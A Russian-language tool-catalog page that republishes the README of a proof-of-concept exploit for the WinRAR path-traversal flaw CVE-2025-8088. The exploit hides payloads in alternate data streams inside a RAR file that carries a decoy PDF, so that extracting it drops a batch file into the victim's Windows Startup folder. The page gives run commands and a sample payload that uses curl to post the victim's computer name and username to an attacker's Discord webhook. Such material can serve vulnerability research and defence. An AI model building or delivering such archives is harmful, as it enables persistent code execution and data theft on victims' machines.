Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
best-CVE-2025-8088 — Эксплуатация CVE в Winrar до версии 7.13 с использованием нескольких потоков ADS в одном файле (Пользовательская реализация PDF) | Kitploit
Инструменты/GitHubGitHub/pentestfunctions/best-cve-2025-8088
Анализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHub
pentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

Эксплуатация CVE в Winrar до версии 7.13 с использованием нескольких потоков ADS в одном файле (Пользовательская реализация PDF)

Репозиторий
1151 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8088 Эксплойт WinRAR 🔓

Эксплойт proof-of-concept для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезные нагрузки в альтернативные потоки данных (ADS) с обходом пути, что потенциально может привести к выполнению произвольного кода.

  • Проблема многих других эксплойтов в том, что они не внедряют несколько ADS-потоков, требуя либо удачи, чтобы попасть в правильный обход пути, либо знания точного имени пользователя/каталога извлечения.

🚀 Как это работает

  1. Создаёт документ-приманку 📄 — генерирует профессионально выглядящий PDF (резюме или отчёт о пентесте)
  2. Внедряет несколько ADS-потоков 🔄 — прикрепляет потоки полезной нагрузки с разной глубиной обхода пути
  3. Изменяет заголовки RAR ⚙️ — модифицирует структуру архива для использования уязвимости обхода пути
  4. Сбрасывает полезную нагрузку в автозагрузку 📂 — пытается записать полезную нагрузку в папку автозагрузки Windows при извлечении

🛠️ Использование

# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Настройка полезной нагрузки

Отредактируйте полезную нагрузку для вызова Discord webhook:

# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Замените YOUR_DISCORD_WEBHOOK_URL на ваш реальный URL вебхука.

🔄 Порядок выполнения

  1. Жертва извлекает RAR с уязвимым WinRAR (≤7.12)
  2. Полезная нагрузка записывается в папку автозагрузки:
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. При следующей перезагрузке ➡️ полезная нагрузка выполняется автоматически

📋 Требования

  • ОС Windows 🪟
  • Python 3.x 🐍
  • Установленный WinRAR
  • Библиотека ReportLab (pip install reportlab)
Скачать инструмент